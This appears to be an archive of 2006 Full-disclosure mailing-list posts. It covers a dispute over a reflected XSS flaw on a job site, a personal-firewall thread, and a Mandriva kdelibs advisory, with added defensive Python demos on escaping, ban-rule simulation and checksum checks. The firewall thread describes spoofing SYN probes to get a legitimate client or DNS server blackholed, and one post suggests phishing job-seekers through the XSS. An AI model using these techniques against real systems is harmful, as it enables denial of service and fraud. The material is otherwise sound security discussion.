> Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulnerabilities, it's just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offers no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything...

I have clearly mentioned in the disclosure that this XSS is not harmful for the server side but you can target a lot of people using this website. If you have completely read my disclosure mail, I have mentioned in the end that a lot of people seeking jobs can be targeted. I can say this because I know the value of this organisation from the point of placements. Moreover this organisation provides security solutions to other companies. From the point of the company's security everything is fine but from the point of its social image..

> Which would be meaningful if:
> A) this site were used by millions of people
> B) there was something worth compromising the site for (like access to webmail, personal information, etc...)
> I think what I'm missing here is why this particular XSS is useful in any way shape or form? Am I missing something significant about this site? Do people trust it for something?

As explained before, it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even I do very much.

> Isn't that what you are doing?

I just posted a disclosure which I felt could be used by some bad guy to target innocent people. If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. At least I don't spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures. Hope I answered all your answers. Let's cut down the argument here.

Regards;
Santosh J

On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
> On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:
>> Hahaha ... native code doesn't seem to understand the meaning of XSS and why it can be of security concern. Here not only url re-direction is possible
>
> Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulnerabilities, it's just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offers no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything...
>
>> but also execution of malicious javascripts is possible. Your Lame reply
>
> Which would be meaningful if:
> A) this site were used by millions of people
> B) there was something worth compromising the site for (like access to webmail, personal information, etc...)
> I think what I'm missing here is why this particular XSS is useful in any way shape or form? Am I missing something significant about this site? Do people trust it for something?
>
>> makes me think that you are one of the following: 1. An employee of MBT criticising me in the interest of the company 'or' 2. A poor spammer who doesn't know anything but tries to show off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.
>
> Isn't that what you are doing?
>
> -sb
>
>> Regards;
>> Santosh J.
[Full-disclosure] Personal firewalls.
Time to throw my .02 cents in.

Zone - Good product, though it requires much thought and proper configuration for successful installs. Does not always save your configuration settings when you shut down. This I find occurs most often when you upgrade Zone from one version to another and do not use the "clean install option." If this occurs you have 2 options.

1. Re-install Zone, utilizing the clean install option, and then re-enter your rules.
2. Do not re-install Zone, but when you have made firewall rule changes, exit out of the program after making the aforementioned changes; when Zone exits, not as part of a shutdown, it seems to correctly flush the configuration to disk.

Another issue with Zone is that they have not yet fixed the bug in the True Vector engine. I can cause True Vector to regularly crash out and leave the system unprotected from a remote client. I have notified Zone's engineers specifically how this was done and to date no response from their side. To their credit, when this occurs now the system loses all network connectivity (with recent update) and the VSMON service now restarts. So even though the bug in True Vector still exists they have worked around it so as to not leave your system completely vulnerable as in the 5.x versions.

But other than this it is a good package, very flexible, and powerful, though requiring a certain level of sophistication to configure it properly.

However I do wish it had the feature that Sygate PRO has, which will blackhole an IP if it detects a port scan coming to it. It then blocks all activity from the offending IP for approximately 10 minutes. It however had a similar problem to Zone in that we could easily get the FW to crash out; however, when it did crash out all connectivity was lost. To date this also has not been fixed.

The other firewalls I've played with all had their own set of feature issues, with Black Ice being the worst piece of Garbage I have had my displeasure of ever installing. Just too damn easy to defeat.

In all cases, I would recommend a firewall software, especially if you are on a laptop and might ever be out on the wild wild internet without being behind a hardware firewall. Preferably something that will also check on programs attempting to make outbound connections. But I would not rely on just a software one either. And with hardware many users/companies make the same mistake, layering firewalls all of the same vendor/brand, so that in the event of an exploit weakness they're all penetrated.
Re: [Full-disclosure] MBT Xss vulnerability
In all honesty, XSS is a serious vector of attack. However, non-persistent XSS is a much less serious problem than is persistent XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed url string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistent nature of the flaw at one dedicated site.

Issues come into play via persistent XSS, which is script that may be embedded in a web application, such as a guestbook or comment section, where people would travel to on their own without the need of a direct link, and then rendered upon visitation in the user's browser.

Further, in today's world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gained and is often of minor importance and information. What is bad is leveraging XSS as a vector for browser exploitation (can we say IFRAME+WMF), so you have a way, via XSS, to COMPROMISE end users' systems.

While the OP does have a valid initial point and theory,
1. it is not persistent in nature
2. it is one site, and not a script used on many sites
3. it does require SE at some level to be effective
4. it should not have been posted to FD (see points 1,2,3)

my2bits,
MW
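The distinction drawn above, as an added example that is not part of the original post and not MBT's code: a toy search page that echoes its query (the non-persistent case, where the payload has to travel in a crafted link) next to a toy guestbook that replays stored entries to every visitor (the persistent case), each in a vulnerable and a hardened form. The page names, the guestbook class and the probe string are constructed; the hardening is output escaping for the HTML text context via Python's `html.escape`.

```python
"""Reflected (non-persistent) vs. stored (persistent) XSS in a toy renderer.

Constructed example: a search page that echoes its query and a guestbook that
replays stored entries. Not code from any real site.
"""
import html
from typing import Dict, List
from urllib.parse import urlencode

# Harmless probe: active content that must never reach the page unescaped.
PROBE = '<script>alert("xss")</script>'


def render_search_vulnerable(query: str) -> str:
    """Reflected XSS: the query is copied into HTML text content verbatim."""
    return f"<h1>Results for: {query}</h1>"


def render_search_hardened(query: str) -> str:
    """Same page, escaped for the HTML text context before output."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def crafted_search_link(base: str, query: str) -> str:
    """The 'pre-formed url string' a reflected flaw depends on: the payload
    lives only in the link, so each victim has to be handed this URL."""
    return f"{base}?{urlencode({'q': query})}"


class Guestbook:
    """Stored case: entries are kept server-side and rendered for everyone
    who visits, so no link has to be delivered to the victim."""

    def __init__(self, escape_on_output: bool) -> None:
        self.entries: List[str] = []
        self.escape_on_output = escape_on_output

    def post(self, text: str) -> None:
        self.entries.append(text)  # stored as submitted; escaping belongs at output

    def render(self) -> str:
        items = (
            html.escape(e, quote=True) if self.escape_on_output else e
            for e in self.entries
        )
        return "<ul>" + "".join(f"<li>{e}</li>" for e in items) + "</ul>"


def contains_active_content(page: str) -> bool:
    """Crude check used by the demo: does raw script markup survive in the page?"""
    return "<script" in page.lower()


def exposure_summary() -> Dict[str, bool]:
    """Run the same probe through all four renderers."""
    gb_vuln, gb_safe = Guestbook(escape_on_output=False), Guestbook(escape_on_output=True)
    for gb in (gb_vuln, gb_safe):
        gb.post("first!")   # a benign entry from another visitor
        gb.post(PROBE)      # one stored entry poisons the page for every later visitor
    return {
        "reflected_vulnerable": contains_active_content(render_search_vulnerable(PROBE)),
        "reflected_hardened": contains_active_content(render_search_hardened(PROBE)),
        "stored_vulnerable": contains_active_content(gb_vuln.render()),
        "stored_hardened": contains_active_content(gb_safe.render()),
    }


if __name__ == "__main__":
    for name, exposed in exposure_summary().items():
        print(f"{name}: {'script survives' if exposed else 'escaped'}")
    print(crafted_search_link("https://example.invalid/search", PROBE))
```

The same escaping fixes both classes, which is the defender's takeaway: the reflected/stored split changes how the payload reaches the victim (a link that must be delivered versus a page people visit on their own), not the remedy on the server.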
Re: [Full-disclosure] MBT Xss vulnerability
On 1/20/06, MuNNa [EMAIL PROTECTED] wrote:
> Hii
>
>> Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulnerabilities, it's just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offers no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything...
>
> I have clearly mentioned in the disclosure that this XSS is not harmful for the server side but you can target a lot of people using this website. If you have completely read my disclosure mail, I have mentioned in the end that a lot of people seeking jobs can be targeted. I can say this because I know the value of this organisation from the point of placements. Moreover this organisation provides security solutions to other companies. From the point of the company's security everything is fine but from the point of its social image..

Okay.

>> Which would be meaningful if:
>> A) this site were used by millions of people
>> B) there was something worth compromising the site for (like access to webmail, personal information, etc...)
>> I think what I'm missing here is why this particular XSS is useful in any way shape or form? Am I missing something significant about this site? Do people trust it for something?
>
> As explained before, it can attract a lot of job-seekers. Millions of them. They trust this organisation. Even I do very much.

Okay see that's why I asked, since this site is used by millions of people that actually answers my question. Thank you.

>> Isn't that what you are doing?
>
> I just posted a disclosure which I felt could be used by some bad guy to target innocent people. If anyone felt that this disclosure is some sort of spam and is really harmless, just discard it. At least I don't spam here by bashing someone else who has posted some disclosure. This bashing attitude reflects Lamer qualities and this discourages others from mailing disclosures.

Yeah I actually felt bad after I wrote that line, I just didn't understand how his response contributed to spam and yours didn't, know what I mean?

> Hope I answered all your answers. Let's cut down the argument here.

You did, and thoroughly! I thank you!

> Regards;
> Santosh J

You da man,
Stan

> On 1/20/06, Stan Bubrouski [EMAIL PROTECTED] wrote:
>> On 1/19/06, MuNNa [EMAIL PROTECTED] wrote:
>>> Hahaha ... native code doesn't seem to understand the meaning of XSS and why it can be of security concern. Here not only url re-direction is possible
>>
>> Why would he be concerned? The problem is that most sites on the internet suffer from XSS vulnerabilities, it's just that nobody cares because there is nothing to gain from the sites. Nothing to gain you say? Yes. Let's take this site you posted about for example, I didn't look over the entire site, but glancing I don't even see anything which XSS would help you compromise. The site seemingly is all static content (minus a search, correct me if I'm wrong) with no e-mail portal, forums, or anything else that the XSS could be leveraged to gain access to. Since the site offers no direct services (right?) what exactly could you trick people into doing here? The session cookie seems worthless since there's no login or anything...
>>
>>> but also execution of malicious javascripts is possible. Your Lame reply
>>
>> Which would be meaningful if:
>> A) this site were used by millions of people
>> B) there was something worth compromising the site for (like access to webmail, personal information, etc...)
>> I think what I'm missing here is why this particular XSS is useful in any way shape or form? Am I missing something significant about this site? Do people trust it for something?
>>
>>> makes me think that you are one of the following: 1. An employee of MBT criticising me in the interest of the company 'or' 2. A poor spammer who doesn't know anything but tries to show off as if he is the MASTER. If this is the case carry on with your spamming business and good luck for your future.
>>
>> Isn't that what you are doing?
>>
>> -sb
>>
>>> Regards;
>>> Santosh J.
Re: [Full-disclosure] MBT Xss vulnerability
On 1/20/06, Morning Wood [EMAIL PROTECTED] wrote:
> In all honesty, XSS is a serious vector of attack. However, non-persistent XSS is a much less serious problem than is persistent XSS. Generally XSS is of no harm to the server side anyway. It can however be leveraged as the OP said, but would require a dedicated, pre-formed url string that needs to be presented to the user to be effective. IMHO the OP advisory should not have been posted, because of the non-persistent nature of the flaw at one dedicated site.

Unless that site is trusted by hundreds of thousands or millions of people, then something minor can be made to be much more serious. For instance, in this case someone could create a form for phishing purposes that looks like a job application and mail it to millions of people who think that it's from MBT.

> Issues come into play via persistent XSS, which is script that may be embedded in a web application, such as a guestbook or comment section, where people would travel to on their own without the need of a direct link, and then rendered upon visitation in the user's browser.
>
> Further, in today's world of browser exploitation, cookie, session, and/or credential theft is not the only thing to be gained and is often of minor importance and information. What is bad is leveraging XSS as a vector for browser exploitation (can we say IFRAME+WMF), so you have a way, via XSS, to COMPROMISE end users' systems.
>
> While the OP does have a valid initial point and theory,
> 1. it is not persistent in nature
> 2. it is one site, and not a script used on many sites

Yes that's what I was thinking, but apparently a lot of people use it, at least that's the gist I got.

> 3. it does require SE at some level to be effective
> 4. it should not have been posted to FD (see points 1,2,3)

This was my concern in previous replies. Why should XSS on one site be posted here, but as the list maintainer stated previously, XSS in big sites like Google or Yahoo is pertinent to this list due to the large number of people they can affect. Assuming the author is correct about it possibly affecting millions of people then its relevance to this list is clearly satisfied.

-sb

> my2bits,
> MW
Re: [Full-disclosure] Personal firewalls.
> However I do wish it had the feature that Sygate PRO has, which will blackhole an IP if it detects a port scan coming to it. It then blocks all activity from the offending IP for approximately 10 minutes.

Well, it's a feature if the probes are really coming from the computer Sygate PRO thinks they're coming from. Suppose X is running Sygate PRO and Y is a legitimate client connecting to a server running on X. Then Z comes along and sends a bunch of SYN packets to X, spoofed to have the source IP of Y, waits 10 minutes, and repeats ad infinitum. Now Y can never connect to X. This seems more like a DoS vulnerability than a feature to me. Am I missing something?

-Eliah

On 1/20/06, Soderland, Craig wrote:
> Time to throw my .02 cents in.
>
> Zone - Good product, though it requires much thought and proper configuration for successful installs. Does not always save your configuration settings when you shut down. This I find occurs most often when you upgrade Zone from one version to another and do not use the clean install option. If this occurs you have 2 options.
>
> 1. Re-install Zone, utilizing the clean install option, and then re-enter your rules.
> 2. Do not re-install Zone, but when you have made firewall rule changes, exit out of the program after making the aforementioned changes; when Zone exits, not as part of a shutdown, it seems to correctly flush the configuration to disk.
>
> Another issue with Zone is that they have not yet fixed the bug in the True Vector engine. I can cause True Vector to regularly crash out and leave the system unprotected from a remote client. I have notified Zone's engineers specifically how this was done and to date no response from their side. To their credit, when this occurs now the system loses all network connectivity (with recent update) and the VSMON service now restarts. So even though the bug in True Vector still exists they have worked around it so as to not leave your system completely vulnerable as in the 5.x versions.
>
> But other than this it is a good package, very flexible, and powerful, though requiring a certain level of sophistication to configure it properly.
>
> However I do wish it had the feature that Sygate PRO has, which will blackhole an IP if it detects a port scan coming to it. It then blocks all activity from the offending IP for approximately 10 minutes. It however had a similar problem to Zone in that we could easily get the FW to crash out; however, when it did crash out all connectivity was lost. To date this also has not been fixed.
>
> The other firewalls I've played with all had their own set of feature issues, with Black Ice being the worst piece of Garbage I have had my displeasure of ever installing. Just too damn easy to defeat.
>
> In all cases, I would recommend a firewall software, especially if you are on a laptop and might ever be out on the wild wild internet without being behind a hardware firewall. Preferably something that will also check on programs attempting to make outbound connections. But I would not rely on just a software one either. And with hardware many users/companies make the same mistake, layering firewalls all of the same vendor/brand, so that in the event of an exploit weakness they're all penetrated.
Re[2]: [Full-disclosure] Personal firewalls.
Dear Eliah Kagan,

EK> Then Z comes along and sends a
EK> bunch of SYN packets to X, spoofed to have the source IP of Y, waits
EK> 10 minutes, and repeats ad infinitum.

Z sends spoofed packets coming from the DNS server of X, even more interesting..

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
Re: Re[2]: [Full-disclosure] Personal firewalls.
> Z sends spoofed packets coming from the DNS server of X, even more interesting..

When Sygate PRO blackholes a host, does it block only unsolicited packets (bad), or does it block *all* incoming packets from that host (worse)?

-Eliah

On 1/20/06, Thierry Zoller [EMAIL PROTECTED] wrote:
> Dear Eliah Kagan,
>
> EK> Then Z comes along and sends a
> EK> bunch of SYN packets to X, spoofed to have the source IP of Y, waits
> EK> 10 minutes, and repeats ad infinitum.
>
> Z sends spoofed packets coming from the DNS server of X, even more interesting..
>
> --
> http://secdev.zoller.lu
> Thierry Zoller
> Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
RE: Re[2]: [Full-disclosure] Personal firewalls.
Any self-respecting network administrator (who knows what he/she is doing) would have planned for that and set up some kind of overriding ruleset that will always allow communication to/from its own resources. A.K.A. the BLACKHOLE / IP BANNING would be overridden for the IPs of its resources, like that of its DNS Servers.

But that, too, could be exploited. If Z spoofs packets using the IP of the DNS Server (the one that is not banned because of the override or 'never ban these IPs', etc.), it would be allowed to send those packets, SYN packets, etc., as was stated, ad infinitum.

As they say, no computer or server is ever *TRULY* secure - even with a software or hardware firewall, or 'voodoo-like' security measures.

Digitalchaos
(just my 2 cents)

-Original Message-
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED] On Behalf Of Thierry Zoller
Sent: Friday, January 20, 2006 5:58 PM
To: full-disclosure@lists.grok.org.uk
Subject: Re[2]: [Full-disclosure] Personal firewalls.

Dear Eliah Kagan,

EK> Then Z comes along and sends a
EK> bunch of SYN packets to X, spoofed to have the source IP of Y, waits
EK> 10 minutes, and repeats ad infinitum.

Z sends spoofed packets coming from the DNS server of X, even more interesting..

--
http://secdev.zoller.lu
Thierry Zoller
Fingerprint : 5D84 BFDC CD36 A951 2C45 2E57 28B3 75DD 0AC6 F1C7
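The X/Y/Z argument in this sub-thread (Eliah's spoofed-SYN scenario, his question about blocking only unsolicited packets versus all packets, and the DNS-server override above), as an added simulation that is not part of any post and is not Sygate PRO's actual logic. The scan threshold, the addresses (192.0.2.0/24 documentation range) and the policy switches are assumptions made for the model; the point it shows is which packets from Y and from X's resolver still get through under each policy once Z has forged their source addresses.

```python
"""Model of a port-scan auto-blackhole rule and the spoofed-source DoS the
thread describes.

Constructed example: a simplified simulation, not Sygate PRO's logic. Hosts
follow the thread: X runs the firewall, Y is a legitimate client, Z forges
packets. Addresses are from the 192.0.2.0/24 documentation range.
"""
from dataclasses import dataclass
from typing import Dict, Iterable, Set

BAN_SECONDS = 600      # thread: offending IP blocked for approximately 10 minutes
SCAN_THRESHOLD = 5     # assumed: distinct ports probed by one source before a ban

Y = "192.0.2.10"       # constructed: legitimate client of X
X_DNS = "192.0.2.53"   # constructed: X's DNS resolver


@dataclass(frozen=True)
class Packet:
    src: str                   # source address as seen on the wire (forgeable)
    dst_port: int
    established: bool = False  # part of a flow X accepted, or a reply X solicited


class BlackholeFirewall:
    """Bans a source after it probes SCAN_THRESHOLD distinct ports.

    stateful=False: a banned source loses everything, live flows included
    (the "all incoming packets" variant Eliah asks about).
    stateful=True: the ban drops only unsolicited packets.
    allowlist: sources never banned, e.g. X's resolver (the override rule).
    """

    def __init__(self, stateful: bool = False, allowlist: Iterable[str] = ()) -> None:
        self.stateful = stateful
        self.allowlist: Set[str] = set(allowlist)
        self.ports_seen: Dict[str, Set[int]] = {}
        self.banned_until: Dict[str, float] = {}

    def is_banned(self, src: str, now: float) -> bool:
        until = self.banned_until.get(src)
        if until is None:
            return False
        if now >= until:                  # ban lapsed: forget the source entirely
            del self.banned_until[src]
            self.ports_seen.pop(src, None)
            return False
        return True

    def accept(self, pkt: Packet, now: float) -> bool:
        """True if the packet reaches X, False if the firewall drops it."""
        if self.is_banned(pkt.src, now):
            return self.stateful and pkt.established
        if pkt.established:
            return True                   # never counted as a probe
        seen = self.ports_seen.setdefault(pkt.src, set())
        seen.add(pkt.dst_port)
        if len(seen) >= SCAN_THRESHOLD and pkt.src not in self.allowlist:
            self.banned_until[pkt.src] = now + BAN_SECONDS
            return False
        return True


def spoofed_probe_burst(fw: BlackholeFirewall, forged_src: str, now: float) -> None:
    """Z's burst of SYNs to distinct ports carrying forged_src as the source."""
    for port in range(1, SCAN_THRESHOLD + 2):
        fw.accept(Packet(forged_src, port), now)


def scenario(stateful: bool = False, allowlist: Iterable[str] = ()) -> Dict[str, bool]:
    """Run the thread's attack against one policy; report who still gets through."""
    fw = BlackholeFirewall(stateful=stateful, allowlist=allowlist)
    fw.accept(Packet(Y, 443), now=0.0)          # Y opens a real session to X
    spoofed_probe_burst(fw, Y, now=1.0)         # Z forges Y ...
    spoofed_probe_burst(fw, X_DNS, now=1.0)     # ... and X's resolver
    result = {
        "y_new_connection": fw.accept(Packet(Y, 443), now=2.0),
        "y_existing_flow": fw.accept(Packet(Y, 443, established=True), now=2.0),
        "dns_reply": fw.accept(Packet(X_DNS, 53, established=True), now=2.0),
        # once the ban lapses Y would recover ...
        "y_after_ban_expires": fw.accept(Packet(Y, 443), now=1.0 + BAN_SECONDS + 1.0),
    }
    spoofed_probe_burst(fw, Y, now=1.0 + BAN_SECONDS + 2.0)   # ... unless Z repeats
    result["y_after_repeat"] = fw.accept(Packet(Y, 443), now=1.0 + BAN_SECONDS + 3.0)
    return result


if __name__ == "__main__":
    for label, kwargs in [("stateless", {}), ("stateful", {"stateful": True}),
                          ("stateless+allowlist", {"allowlist": [X_DNS]})]:
        print(label, scenario(**kwargs))
```

Under every policy Y's new connections are refused for as long as Z keeps repeating the burst, which is Eliah's point; what the switches change is the blast radius. Dropping only unsolicited packets keeps Y's already-open session and X's own DNS replies alive, and the allowlist keeps the resolver from being banned at all, but neither lets the firewall tell a forged source from a real one, so a rule keyed on an unauthenticated source address cannot be more than a nuisance filter.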
Re: [Full-disclosure] Personal firewalls.
You are then saying don't buy your firewall bundled with your anti virus. Logically that makes sense. It seems though that most AV vendors sell a firewall with their deluxe packages, maybe because they think you need one and it gives them a little extra revenue.

I have dialup and no firewall on my desktop and so far so good. Haven't had to rebuild the system yet and I have had it since March 2001. Came close to getting it messed up when I had Norton but was saved by AVG Free.

Currently I have my email on a server where they keep the server anti virus up to date. I have not seen a virus in email in months. I still need desktop anti virus but it sure does cut down on the malware that shows up on my desktop.

Regards,
Nancy Kramer

At 03:28 PM 1/20/2006, Soderland, Craig wrote:
> And with hardware many users/companies make the same mistake, layering firewalls all of the same vendor/brand, so that in the event of an exploit weakness they're all penetrated.
[Full-disclosure] MDKSA-2006:019 - Updated kdelibs packages fix vulnerability
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDKSA-2006:019
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : kdelibs
 Date    : January 20, 2006
 Affected: 2006.0, Corporate 3.0
 _______________________________________________________________________

 Problem Description:

 A heap overflow vulnerability was discovered in kjs, the KDE JavaScript
 interpreter engine. An attacker could create a malicious web site that
 contained carefully crafted JavaScript code that could trigger the flaw
 and potentially lead to the arbitrary execution of code as the user
 visiting the site.

 The updated packages have been patched to correct this problem.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-0019
 _______________________________________________________________________

 Updated Packages:

 Mandriva Linux 2006.0:
 6d11e781a5112ab7d2c991df1bca4c0d  2006.0/RPMS/kdelibs-common-3.4.2-31.3.20060mdk.i586.rpm
 09ddb324793a6af1e5bb55912896a9a1  2006.0/RPMS/kdelibs-devel-doc-3.4.2-31.3.20060mdk.i586.rpm
 6211efda291f9327ed98d3aca442b1f0  2006.0/RPMS/libkdecore4-3.4.2-31.3.20060mdk.i586.rpm
 77f643da674997a6ae38acd761f3016a  2006.0/RPMS/libkdecore4-devel-3.4.2-31.3.20060mdk.i586.rpm
 57fb02e73896d75f28d9f9aad5f5dfef  2006.0/SRPMS/kdelibs-3.4.2-31.3.20060mdk.src.rpm

 Mandriva Linux 2006.0/X86_64:
 84b25eefbb6fa383dbc4ccf92c873f74  x86_64/2006.0/RPMS/kdelibs-common-3.4.2-31.3.20060mdk.x86_64.rpm
 c3e42fe27e73df2da68ba768f0dbee4c  x86_64/2006.0/RPMS/kdelibs-devel-doc-3.4.2-31.3.20060mdk.x86_64.rpm
 a6a7258b0990a09b099e039f54db18bb  x86_64/2006.0/RPMS/lib64kdecore4-3.4.2-31.3.20060mdk.x86_64.rpm
 62a2e822dab43b67f7cdfb9258725d2b  x86_64/2006.0/RPMS/lib64kdecore4-devel-3.4.2-31.3.20060mdk.x86_64.rpm
 6211efda291f9327ed98d3aca442b1f0  x86_64/2006.0/RPMS/libkdecore4-3.4.2-31.3.20060mdk.i586.rpm
 77f643da674997a6ae38acd761f3016a  x86_64/2006.0/RPMS/libkdecore4-devel-3.4.2-31.3.20060mdk.i586.rpm
 57fb02e73896d75f28d9f9aad5f5dfef  x86_64/2006.0/SRPMS/kdelibs-3.4.2-31.3.20060mdk.src.rpm

 Corporate 3.0:
 e3b716c3fef88118742882a139d589fa  corporate/3.0/RPMS/kdelibs-common-3.2-36.15.C30mdk.i586.rpm
 439b0acb1afd62c8f894317ad5922557  corporate/3.0/RPMS/libkdecore4-3.2-36.15.C30mdk.i586.rpm
 77e5302db914631a223c7fb6a55c623b  corporate/3.0/RPMS/libkdecore4-devel-3.2-36.15.C30mdk.i586.rpm
 8399789d3975218e919c7544cf4fff41  corporate/3.0/SRPMS/kdelibs-3.2-36.15.C30mdk.src.rpm

 Corporate 3.0/X86_64:
 04d568123ae0f632020b16d7ca3c79b5  x86_64/corporate/3.0/RPMS/kdelibs-common-3.2-36.15.C30mdk.x86_64.rpm
 6c0451aa188253c07d9865880cb32c35  x86_64/corporate/3.0/RPMS/lib64kdecore4-3.2-36.15.C30mdk.x86_64.rpm
 22160903e03c77c575a84ed9ef045ac6  x86_64/corporate/3.0/RPMS/lib64kdecore4-devel-3.2-36.15.C30mdk.x86_64.rpm
 439b0acb1afd62c8f894317ad5922557  x86_64/corporate/3.0/RPMS/libkdecore4-3.2-36.15.C30mdk.i586.rpm
 8399789d3975218e919c7544cf4fff41  x86_64/corporate/3.0/SRPMS/kdelibs-3.2-36.15.C30mdk.src.rpm
 _______________________________________________________________________

 To upgrade automatically use MandrivaUpdate or urpmi. The verification
 of md5 checksums and GPG signatures is performed automatically for you.

 All packages are signed by Mandriva for security. You can obtain the
 GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

 You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

 If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
 _______________________________________________________________________

 Type Bits/KeyID     Date       User ID
 pub  1024D/22458A98 2000-07-10 Mandriva Security Team
  <security*mandriva.com>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.4 (GNU/Linux)

iD8DBQFD0Wo/mqjQ0CJFipgRAmZ5AJwIj2pNBFllFW3SJGKuFTtDxynGqACg0D5Q
gtPHEfoCPKr+iAPlyii2ugE=
=6CJe
-----END PGP SIGNATURE-----
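The manual counterpart of the automatic md5 check the advisory mentions, as an added example that is not Mandriva's code: it parses advisory-style "<md5>  <path>" lines, streams each downloaded package through MD5, and reports which files match, which differ and which were never fetched. The mirror directory, the file contents and the checksum lines inside demo() are constructed for the self-test; the parser itself is applied to the real listing above.

```python
# Added example, not part of the advisory: verify downloaded update packages by hand against
# the "<md5>  <path>" lines above, for a host where the automatic check in urpmi is not used.
# The mirror directory, files and checksum lines used by demo() are constructed.
import hashlib
import os
import tempfile

HEX = set("0123456789abcdef")

def parse_checksum_lines(text):
    """Return (md5, relative path) pairs from advisory-style lines, ignoring headings and prose."""
    pairs = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) == 2 and len(parts[0]) == 32 and set(parts[0].lower()) <= HEX:
            pairs.append((parts[0].lower(), parts[1]))
    return pairs

def md5_of_file(path, chunk=1 << 16):
    """Stream the file so large RPMs do not have to fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()

def verify_advisory(text, mirror_root):
    """Classify every listed package as ok, failed (digest mismatch) or missing (not downloaded)."""
    result = {"ok": [], "failed": [], "missing": []}
    for expected, rel in parse_checksum_lines(text):
        path = os.path.join(mirror_root, *rel.split("/"))
        if not os.path.isfile(path):
            result["missing"].append(rel)
        elif md5_of_file(path) == expected:
            result["ok"].append(rel)
        else:
            result["failed"].append(rel)
    return result

def demo():
    """Constructed mirror: one intact file, one altered in transit, one never downloaded."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "2006.0", "RPMS"))
    with open(os.path.join(root, "2006.0", "RPMS", "good.rpm"), "wb") as f:
        f.write(b"hello\n")                       # md5 b1946ac92492d2347c6235b4d2611184
    with open(os.path.join(root, "2006.0", "RPMS", "bad.rpm"), "wb") as f:
        f.write(b"tampered\n")
    listing = """Mandriva Linux 2006.0 (constructed listing, same layout as the advisory):
b1946ac92492d2347c6235b4d2611184  2006.0/RPMS/good.rpm
b1946ac92492d2347c6235b4d2611184  2006.0/RPMS/bad.rpm
b1946ac92492d2347c6235b4d2611184  2006.0/RPMS/never-downloaded.rpm
"""
    return verify_advisory(listing, root)

if __name__ == "__main__":
    print(demo())
```

The digest list only catches a download that was corrupted or swapped in transit. MD5 collisions were already practical by the time of this advisory, so the GPG signature on each package, made with the 0x22458A98 key named above and checked by urpmi on your behalf, is what actually ties the files to Mandriva; a hand-rolled md5 pass is a transport check, not a substitute for verifying that signature.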